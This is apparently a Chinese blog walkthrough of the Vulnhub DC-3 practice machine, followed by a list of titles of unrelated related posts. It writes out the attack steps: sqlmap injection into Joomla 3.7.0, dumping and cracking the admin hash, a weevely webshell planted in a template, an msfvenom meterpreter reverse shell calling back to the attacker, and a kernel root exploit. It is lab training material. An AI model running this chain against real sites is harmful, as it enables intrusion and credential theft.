【DC】DC-3

阿新 • • 發佈：2022-04-03

kali：192.168.223.131
target：192.168.223.157

首先確定目標IP為192.168.223.157

arp-scan -l

nmap掃描開放埠，發現只開放了80

nmap -T4 -A 192.168.223.157 -p 1-65535

whatweb判斷網站模板，發現使用Joomla模板製作

whatweb http://192.168.223.157

對於這些出名的CMS，使用Joomla專門的掃描工具進行掃描

joomscan --url http://192.168.223.157

找到後臺地址在/administrator，發現後臺，但不知道使用者名稱和密碼

由於搜尋出來是Joomla 3.7.0 ，搜尋一下有沒有對應版本的漏洞，找到一個sql注入漏洞，拷貝下來

searchsploit Joomla 3.7.0
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt 42033.txt

此時檢視該txt檔案，要求我們使用該語句進行操作

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

修改一下localhost，使用sqlmap跑一下，稍等片刻，發現庫名為joomladb

sqlmap -u "http://192/168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

接著跑表名，發現很多表，最有可能的是 #__users表，由於有奇怪的符號，所以用雙引號框起來

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

接下來跑列名，發現6列，最重要的name和password

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

進行資訊榨取，獲取使用者名稱和密碼為admin和$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

sqlmap -u "http://192.168.223.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering]

建立一個txt檔案，將密碼丟進去進行破解，獲得密碼為snoopy，登陸進去

touch pass.txt
john pass.txt

登陸進去後發現裡面有可以編輯檔案的地方，在Extensions—Templates—Templates中，點選一個模板，在裡面新增檔案並通過拼接獲得檔案路徑

http://192.168.223.157/templates/beez3/html/com_contact/contact/haha.php

通過weevely生成密碼123456的php木馬，將其複製進去

weevely generate 123456 webshell.php

進行連線，通過使用/不使用冒號使用命令，是kali的一句話木馬

weevely http://192.168.223.157/templates/beez3/html/com_contact/contact/haha.php 123456

檢視Linux系統核心版本，是Ubuntu 16.04的版本

nmap -O 192.168.223.157
find / -user root -perm -4000 -print 2>/dev/null
lsb_release -a

對該版本進行漏洞搜尋，檢視如何處理，提示我們去GitHub下載

searchsploit Ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt 39772.txt

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

將該zip下載到kali，通過python開啟的網站服務讓目標下載

//kali
python -m SimpleHTTPServer 8000

//target
wget 192.168.223.131:8000/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

這裡無法提權到root，換成msf

//terminal1
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.223.131 LPORT=4444 > msfshell.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
exploit

//terminal2
python -m SimpleHTTPServer 8000

//terminal3
wget 192.168.223.131:8000/msfshell.php

//訪問網址
192.168.223.157/templates/beez3/html/com_contact/contact/msfshell.php

目標上線後再次進入39772檔案執行doubleput檔案，可以執行，提權至root

到root目錄下檢視flag，遊戲結束

【DC】DC-3

kali：192.168.223.131 target：192.168.223.157 首先確定目標IP為192.168.223.157 arp-scan -l nmap掃描開放埠，發現只開放了80

【Vulnhub】DC-1靶機

一、資訊收集　　1.1 環境　　　　kali ： 192.168.124.141 　　　　DC-1 ： 192.168.124.150

【Vulnhub】DC-2靶機

Vulnhub DC-2 靶機資訊蒐集訪問web端發現訪問不了，可以觀察到相應的URL為域名而不是IP，需要在hosts檔案種新增一條DNS記錄。

【DC】DC-1

kali：192.168.223.131 target：192.168.223.155 由於放在同一個虛擬機器下預設在內網，但DC系列沒有告訴我們IP地址，需要掃一下

【DC】DC-5

kali：192.168.223.131 target：192.168.223.159 首先確定目標IP為192.168.223.159 arp-scan -l nmap掃描開放埠，發現開啟80、111和51343埠

【DC】DC-4

kali：192.168.223.131 target：192.168.223.158 首先確定目標IP為192.168.223.158 arp-scan -l nmap掃描開放埠，發現開啟22和80埠

【DC】DC-7

kali：192.168.223.131 target：192.168.223.160 首先確定目標IP為192.168.223.160 arp-scan -l nmap掃描開放埠，發現開啟22(SSH)、80(HTTP)

【DC】DC-8

kali：192.168.223.131 target：192.168.223.161 首先確定目標IP為192.168.223.161 arp-scan -l nmap掃描開放埠，發現開啟22(SSH)、80(HTTP)

【轉】 springBoot(3)---目錄結構，檔案上傳

【轉】 springBoot(3)---目錄結構，檔案上傳目錄結構，檔案上傳一、目錄結構 1、目錄講解

【reverse】逆向3 尋找地址

【reverse】逆向3 尋找地址定址公式一：[立即數] 讀取記憶體的值： mov eax,dword prt ds:[0x13FFC4]

【STM32H7】第3章 ThreadX USBX協議棧移植到STM32H7

教程更新中：http://www.armbbs.cn/forum.php?mod=viewthread&tid=108546 第3章 ThreadX USBX協議棧移植到STM32H7

【STM32F407】第3章 ThreadX USBX協議棧移植到STM32F407

教程更新中：http://www.armbbs.cn/forum.php?mod=viewthread&tid=108546 第3章 ThreadX USBX協議棧移植到STM32F407

【STM32F429】第3章 ThreadX USBX協議棧移植到STM32F429

教程更新中：http://www.armbbs.cn/forum.php?mod=viewthread&tid=108546 第3章 ThreadX USBX協議棧移植到STM32F429

【Hbase】1.3.1版本安裝

環境： 1核4G記憶體128G磁碟，三臺機器同一個配置 192.168.242.131 192.168.242.132 192.168.242.133

【leetcode】2022-3-1

704.二分查詢給定一個 n 個元素有序的（升序）整型陣列 nums 和一個目標值 target ，寫一個函式搜尋 nums 中的 target，如果目標值存在返回下標，否則返回 -1。

【maimaiDX】大都會3相關角色、歌曲背景翻譯與整理

寫在前面：文字來自maimaiDX日本版官方網站。我本來的目的是想要方便地檢視各區域角色的背景資料，但是我又懶得開啟瀏覽器上官網去看（）而且手機看官網很不方便，所以，為了我自己方便，也為了其他有這方面需求的玩

【公告】關於 3月 31 日無法收到驗證郵件的問題

來自官方論壇簡體中文區 Tenno 大家好！感謝大家的反饋和耐心等待。我們非常關注和重視大家所遇到的問題，並且一直在深入調查這個問題發生的原因，以及尋找安全可行的解決方案。

【牛頭鹿DC】韓服天命之子3.31暗RAID陣容分析

前言：本陣容分析針對202100506韓服DC暗RAID，陣容分析基於作者個人理解，有更好的建議歡迎提出。

【譯】MongoDB Shema 設計的6條經驗法則 3

6 Rules of Thumb for MongoDB Schema Design: Part 3 作者 William Zola， Lead Technical Support Engineer at MongoDB

【譯】單頁面應用與ASP.NET Core 3.0

原文連結隨著Angular,React,Vue以及其他一些前端技術的成熟，Web開發在過去的幾年中已經發生了很大的改變，從建立Web頁面轉向建立應用程式，同時從在服務端渲染標記，轉向直接在瀏覽器中渲染。大部分情況下，這使得

【DC】DC-3

相關推薦